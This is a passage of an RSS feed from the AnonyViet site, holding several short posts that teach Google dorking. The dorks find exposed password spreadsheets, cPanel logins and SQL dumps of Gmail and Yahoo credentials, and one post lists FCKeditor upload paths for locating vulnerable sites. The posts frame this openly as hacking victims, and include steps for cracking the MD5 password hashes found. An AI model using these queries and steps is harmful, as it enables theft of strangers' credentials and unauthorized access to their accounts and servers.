ZMz/iqzMUwmTbei/RL8TRK3jjeo/EVkJIiPEDIoa4UvzFIYm2BNOtxA9GgK1OK1RFenFelMS1auw1RlanFagGyQGrsNUcNXQahQbJANe5pgPXYaloNkK60G1lOZIlOfTrUywsIYBiGNYx6ACug1e81Z29WFUh/nrkvTXNXhelxDkOFq4LU2XrgtTqIrZ2z02zVwzU2zUyQrZ67Uy71470w7UwBO1MSNXrtUd2ooB47VGkau5GqNI1MAbkao0jU5I1RZGpkAbkaosjU7I1RJWpjHnNSpnmr2sApENPoaVKnMPo1PqaVKsAvtCZuaje3jOK9pVzcvZWB5cR5G9Z7r1qYZ+cbb5pUqHG9hkFujXwljB8QN6sValSotbFQ4r06r0qVAI4GroPSpUDHQauualSoGPealzV7So0GzznrwtSpVgWcl64L0qVYw2z00z0qVEAyz0070qVEww70w7UqVMYjyPUaRq9pURSLI1RpGpUqYxGkaokrUqVEwzzUqVKsA/9k=" alt="Exploiting Passwords stored on Websites with Google Dork 4" width="274" height="184" title="Exploiting Passwords stored on Websites with Google Dork 6"/>The instructions below will help you find the user password easily through google search engine and keywords</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>You guys come in<a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fgoogle.com.vn" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"> http://google.com.vn</a>type the command below:</p>
<pre class="lang:default decode:true">inurl:wp-content/uploads filetype:xls | filetype:xlsx password</pre>
<p>Google will list us the excel files that store user passwords.</p>
<p>My simple task is to download the excel file and open it to see :))</p>
<p>Good luck with your hacking!</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;1009&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/exploiting-passwords-stored-on-websites-with-google-dork/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/login-username-password.jpeg" medium="image"></media:content>
            	</item>
		<item>
		<title>Access to Cpanel for free using Google Dork</title>
		<link>https://en.anonyviet.com/access-to-cpanel-for-free-using-google-dork/</link>
					<comments>https://en.anonyviet.com/access-to-cpanel-for-free-using-google-dork/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 31 Jan 2023 22:58:14 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[access]]></category>
		<category><![CDATA[Cpanel]]></category>
		<category><![CDATA[Dork]]></category>
		<category><![CDATA[free]]></category>
		<category><![CDATA[Google]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7604</guid>

					<description><![CDATA[Access to Cpanel for free using Google Dork Join the channel Telegram of the AnonyViet 👉 Link 👈 Most hosting today use port 2082 dedicated to cpanel access, This trick is based on google dork to search in which we can access demo cpanels of many webhosting like hostgator, hostmonster… etc. It&#8217;s just a simple [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p><strong>Access to Cpanel for free using Google Dork</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>Most hosting today use port 2082 dedicated to cpanel access,</p>
<p>This trick is based on google dork to search in which we can access demo cpanels of many webhosting like hostgator, hostmonster… etc.</p>
<p>It&#8217;s just a simple method… try it and see : EASY</p>
<p><b>Into the  <a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fwww.google.com%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">http://www.google.com</a> and type the command:</b></p>
</p>
<pre class="lang:default decode:true ">inurl:2082/login/?user=</pre>
</p>
<p>Or simply enter  <strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fadf.ly%2F1UUPNE" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">this link</a></strong><br />You will get a lot of results and… do whatever you like to research</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;1061&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/access-to-cpanel-for-free-using-google-dork/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2016/01/cpanel_logo.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Dork Upload File FCKeditor [Update]</title>
		<link>https://en.anonyviet.com/dork-upload-file-fckeditor-update/</link>
					<comments>https://en.anonyviet.com/dork-upload-file-fckeditor-update/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 31 Jan 2023 21:42:56 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Dork]]></category>
		<category><![CDATA[FCKeditor]]></category>
		<category><![CDATA[file]]></category>
		<category><![CDATA[Update]]></category>
		<category><![CDATA[Upload]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7574</guid>

					<description><![CDATA[Today I updated some Dork Upload File FCKeditor, so that you can easily find more websites with this error. Join the channel Telegram of the AnonyViet 👉 Link 👈 How to exploit FCK error you see in the tutorial here Dork: index of admin/fckeditor/editor/filemanager/&#13; ----------------------------------------------------------------------------&#13; /bbadmin/editors/fckeditor/editor/filemanager/upload/test.html&#13; /FCKeditor_Ap/editor/filemanager/connectors/uploadtest.html&#13; /admin/FCKeditor_Ap/editor/filemanager/connectors/uploadtest.html&#13; /login/editors/fckeditor/editor/filemanager/upload/test.html&#13; /mods/ckeditor/filemanager/connectors/uploadtest.html&#13; /administrator/FCKeditor1/editor/filemanager/connectors/uploadtest.html&#13; /admin/FCKeditor1/editor/filemanager/connectors/uploadtest.html&#13; /FCKeditor1/editor/filemanager/connectors/uploadtest.html&#13; /cms/FCKeditor/editor/filemanager/connectors/uploadtest.html&#13; /administrator/FCKeditor/editor/filemanager/connectors/uploadtest.html&#13; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>Today I updated some Dork Upload File FCKeditor, so that you can easily find more websites with this error.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>How to exploit FCK error you see in the tutorial<strong> <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fhuong-dan-hack-website-thong-qua-loi-fck%2F" rel="noopener" class="local-link">here</a></strong></p>
<pre class="lang:default decode:true  ">Dork: index of admin/fckeditor/editor/filemanager/&#13;
 ----------------------------------------------------------------------------&#13;
/bbadmin/editors/fckeditor/editor/filemanager/upload/test.html&#13;
/FCKeditor_Ap/editor/filemanager/connectors/uploadtest.html&#13;
/admin/FCKeditor_Ap/editor/filemanager/connectors/uploadtest.html&#13;
/login/editors/fckeditor/editor/filemanager/upload/test.html&#13;
/mods/ckeditor/filemanager/connectors/uploadtest.html&#13;
/administrator/FCKeditor1/editor/filemanager/connectors/uploadtest.html&#13;
/admin/FCKeditor1/editor/filemanager/connectors/uploadtest.html&#13;
/FCKeditor1/editor/filemanager/connectors/uploadtest.html&#13;
/cms/FCKeditor/editor/filemanager/connectors/uploadtest.html&#13;
/administrator/FCKeditor/editor/filemanager/connectors/uploadtest.html&#13;
/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html&#13;
/FCKeditor/editor/filemanager/connectors/uploadtest.html&#13;
/administrator/editors/fckeditor/editor/filemanager/upload/test.html&#13;
/admin/editors/fckeditor/editor/filemanager/upload/test.html&#13;
/admin/editor/filemanager/upload/test.html&#13;
/admin/editor/filemanager/connectors/uploadtest.html&#13;
/editor/filemanager/connectors/uploadtest.html&#13;
/editors/fckeditor/editor/filemanager/upload/test.html&#13;
/js/fckeditor/editor/filemanager/connectors/test.html&#13;
/js/FCKeditor/editor/filemanager/upload/test.html&#13;
/js/FCKeditor/editor/filemanager/connectors/uploadtest.html&#13;
/js/fckeditor/editor/filemanager/connectors/test.html&#13;
/js/fckeditor/editor/filemanager/browser/default/connectors/test.html&#13;
/public/js/FCKeditor/editor/filemanager/upload/test.html&#13;
/public/js/FCKeditor/editor/filemanager/connectors/uploadtest.html&#13;
/public/js/fckeditor/editor/filemanager/connectors/test.html&#13;
/public/js/fckeditor/editor/filemanager/browser/default/connectors/test.html&#13;
/fckeditor/editor/filemanager/browser/default/connectors/test.html&#13;
/webeditor/editor/filemanager/connectors/uploadtest.html&#13;
/webeditor/editor/filemanager/connectors/test.html&#13;
/webeditor/editor/filemanager/browser/default/connectors/test.html&#13;
/admin/fckeditor/editor/filemanager/connectors/test.html&#13;
/admin/FCKeditor/editor/filemanager/upload/test.html&#13;
/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html&#13;
/admin/fckeditor/editor/filemanager/connectors/test.html&#13;
/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html&#13;
/editor/editor/filemanager/upload/test.html&#13;
/FCKeditor/editor/filemanager/upload/test.html&#13;
/FCKeditor/editor/filemanager/connectors/uploadtest.html&#13;
/fckeditor/editor/filemanager/connectors/test.html&#13;
/fckeditor/editor/filemanager/browser/default/connectors/test.html&#13;
/editor/editor/filemanager/connectors/uploadtest.html&#13;
/editor/editor/filemanager/connectors/test.html&#13;
/editor/editor/filemanager/browser/default/connectors/test.html&#13;
/js/FCKeditor/editor/filemanager/upload/test.html&#13;
/webmanage/FCKeditor/editor/filemanager/connectors/uploadtest.html&#13;
/webmanage/fckeditor/editor/filemanager/connectors/test.html&#13;
/webmanage/fckeditor/editor/filemanager/browser/default/connectors/test.html&#13;
/admin/system/editor/FCKeditor/editor/fckeditor.Html</pre>
</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;1119&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/dork-upload-file-fckeditor-update/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2016/01/TheAppleHackAndWhatItMeansToYou.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Hack Email Password with Google Dork</title>
		<link>https://en.anonyviet.com/hack-email-password-with-google-dork/</link>
					<comments>https://en.anonyviet.com/hack-email-password-with-google-dork/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 31 Jan 2023 20:51:10 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Dork]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Password]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7556</guid>

					<description><![CDATA[Today I came up with an idea like this: Hack Email Password with Google Dork Join the channel Telegram of the AnonyViet 👉 Link 👈 I will search for keywords ending in sql (sql is the extension of a file containing the database), in the file content there will be the word @gmail.com and password [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>Today I came up with an idea like this: Hack Email Password with Google Dork</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>I will search for keywords ending in <strong>sql </strong>(sql is the extension of a file containing the database), in the file content there will be the word <strong>@gmail.com</strong> and <strong>password</strong></p>
<p>Go to google use the following command to search:</p>
<pre class="lang:default decode:true">ext:sql intext:@gmail.com intext:password&#13;
</pre>
<p><strong>Result:</strong></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F09%2Fgmail.png" rel="attachment wp-att-1248 noopener" class="local-link"><img decoding="async" class="alignnone size-full wp-image-1248" src="https://anonyviet.com/wp-content/uploads/2017/09/gmail.png" alt="gmail" width="780" height="642" title="Hack Email Password with Google Dork 7"/></a></p>
<p>Similarly, I search for the password of <strong>Yahoo!</strong> to watch</p>
<pre class="lang:default decode:true">ext:sql intext:@yahoo.com intext:password</pre>
<p><img decoding="async" loading="lazy" class="alignnone size-full wp-image-1249" src="https://anonyviet.com/wp-content/uploads/2017/09/yahoo.png" alt="yahoo" width="760" height="634" title="Hack Email Password with Google Dork 8"/></p>
</p>
<p>It&#8217;s surprising, isn&#8217;t it guys, hacking is not something too sublime, sometimes it just takes a little brainstorming, thinking of something a little simpler, everything will be easier.</p>
<p>For those of you who often use phishing to save files as txt, why don&#8217;t I try with the keyword ext:txt?  That part is for you to practice</p>
<p>Good luck</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;1247&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/hack-email-password-with-google-dork/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2016/01/ea8f1-emailhackpassword.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Instructions to hack Email with Google Dork</title>
		<link>https://en.anonyviet.com/instructions-to-hack-email-with-google-dork/</link>
					<comments>https://en.anonyviet.com/instructions-to-hack-email-with-google-dork/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 31 Jan 2023 03:49:08 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Dork]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Instructions]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7157</guid>

					<description><![CDATA[Bao is hacking for fun, I use a trick on Google to infiltrate the SQL file that stores the database of a website, depending on the victim, I can collect the login user/password of the Website member or Email/ Password. Join the channel Telegram of the AnonyViet 👉 Link 👈 I will use the prefix [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p><strong>Bao is hacking for fun, I use a trick on Google to infiltrate the SQL file that stores the database of a website, depending on the victim, I can collect the login user/password of the Website member or Email/ Password.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>I will use the prefix <strong>ext</strong> to search for SQL files containing the character @gmail.com followed by a sequence of MD5 encrypted passwords.  The structure of using Google Dork is as follows:</p>
<pre class="lang:default decode:true">ext:sql intext:@gmail.com intext:25f9e794323b453885f5181f1b624d0b</pre>
<p><strong>Explain:</strong></p>
<p><span style="color: #0000ff;">ext:sql</span> -> search on google which websites to expose SQL files</p>
<p><span style="color: #0000ff;">intext:@hotmail.com</span> –> Next, look in the SQL file you just searched for, is there any text that is @hotmail.com or not</p>
<p><span style="color: #0000ff;">intext:e10adc3949ba59abbe56e057f20f883e <span style="color: #000000;">–> if there is @hotmail.com, is there this sequence of characters behind it?  This is the sequence of password characters encrypted with MD5, which translates as: “12345689”</span></span></p>
<p><em>If the password encrypted by MD5.  You can use the website <a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fmd5cracker.org%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">http://md5cracker.org/</a> paste the encoding character in to reverse the encoding. <span style="color: #ff0000;">However, depending on the available dictionary of the Web, not all passwords can be translated.</span></em></p>
<p><span style="text-decoration: underline;"><strong>Demos are as follows:</strong></span></p>
<p><strong>Step 1: </strong>Paste the above Dork snippet into the Google Search bar:</p>
<p><img decoding="async" class="alignnone size-full wp-image-4034" src="https://anonyviet.com/wp-content/uploads/2017/01/0.png" alt="Instructions to hack Email with Google Dork 2" width="836" height="62" srcset="https://anonyviet.com/wp-content/uploads/2017/01/0.png 836w, https://anonyviet.com/wp-content/uploads/2017/01/0-300x22.png 300w, https://anonyviet.com/wp-content/uploads/2017/01/0-768x57.png 768w, https://anonyviet.com/wp-content/uploads/2017/01/0-750x56.png 750w" sizes="(max-width: 836px) 100vw, 836px" title="Instructions to hack Email with Google Dork 5"/></p>
<p><strong>Step 2: </strong>Choose any website you like, with a .sql extension behind it</p>
<p><img decoding="async" loading="lazy" class="alignnone size-full wp-image-4035" src="https://anonyviet.com/wp-content/uploads/2017/01/1-1-4.png" alt="first" width="626" height="472" srcset="https://anonyviet.com/wp-content/uploads/2017/01/1-1-4.png 626w, https://anonyviet.com/wp-content/uploads/2017/01/1-1-4-300x226.png 300w" sizes="auto, (max-width: 626px) 100vw, 626px" title="Instructions to hack Email with Google Dork 6"/></p>
<p><strong>Step 3: </strong>After accessing the Web you will see a text forest, scroll down to find where there is an encrypted Email and Pass, then Copy it, then go to the MD5 decompiler page to decrypt the password.</p>
<p><img post-id="7157" fifu-featured="1" decoding="async" loading="lazy" class="alignnone size-full wp-image-4036" src="https://anonyviet.com/wp-content/uploads/2017/01/2-7.png" alt="Instructions to hack Email with Google Dork" title="Instructions to hack Email with Google Dork" width="918" height="405" srcset="https://anonyviet.com/wp-content/uploads/2017/01/2-7.png 918w, https://anonyviet.com/wp-content/uploads/2017/01/2-7-300x132.png 300w, https://anonyviet.com/wp-content/uploads/2017/01/2-7-768x339.png 768w, https://anonyviet.com/wp-content/uploads/2017/01/2-7-750x331.png 750w" sizes="auto, (max-width: 918px) 100vw, 918px" title="Instructions to hack Email with Google Dork 7"/></p>
</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;1984&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/instructions-to-hack-email-with-google-dork/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2017/01/2-7.png" medium="image"></media:content>
            	</item>
		<item>
		<title>What is Google Dork?  Update Google Hacking Dork 2022</title>
		<link>https://en.anonyviet.com/what-is-google-dork-update-google-hacking-dork-2022/</link>
					<comments>https://en.anonyviet.com/what-is-google-dork-update-google-hacking-dork-2022/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 24 Jan 2023 15:44:20 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Dork]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Update]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=1946</guid>

					<description><![CDATA[Google Dorking is pushing Google Search to its limits, using advanced search operators to tell Google exactly what you want. Many people consider it a Data Stealing Technique to find unprotected sensitive information about a company, but I consider it a Hacker&#8217;s Way of Thinking because I use Google Dorks for more purposes than security [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>Google Dorking is pushing Google Search to its limits, using advanced search operators to tell Google exactly what you want.  Many people consider it a Data Stealing Technique to find unprotected sensitive information about a company, but I consider it a Hacker&#8217;s Way of Thinking because I use Google Dorks for more purposes than security research. secret.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="1946" fifu-featured="1" decoding="async" class="aligncenter wp-image-40624 size-full" src="https://anonyviet.com/wp-content/uploads/2022/04/YgRt72CDbOPNX7jxYQppccDYAQPMv0kN.jpg" alt="What is Google Dork?  Update Google Hacking Dork 2022" title="What is Google Dork?  Update Google Hacking Dork 2022" width="1170" height="660" srcset="https://anonyviet.com/wp-content/uploads/2022/04/YgRt72CDbOPNX7jxYQppccDYAQPMv0kN.jpg 1170w, https://anonyviet.com/wp-content/uploads/2022/04/YgRt72CDbOPNX7jxYQppccDYAQPMv0kN-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/04/YgRt72CDbOPNX7jxYQppccDYAQPMv0kN-1024x578.jpg 1024w, https://anonyviet.com/wp-content/uploads/2022/04/YgRt72CDbOPNX7jxYQppccDYAQPMv0kN-768x433.jpg 768w, https://anonyviet.com/wp-content/uploads/2022/04/YgRt72CDbOPNX7jxYQppccDYAQPMv0kN-750x423.jpg 750w, https://anonyviet.com/wp-content/uploads/2022/04/YgRt72CDbOPNX7jxYQppccDYAQPMv0kN-1140x643.jpg 1140w" sizes="(max-width: 1170px) 100vw, 1170px" title="What is Google Dork?  Update Google Hacking Dork 2022 4"/></p>
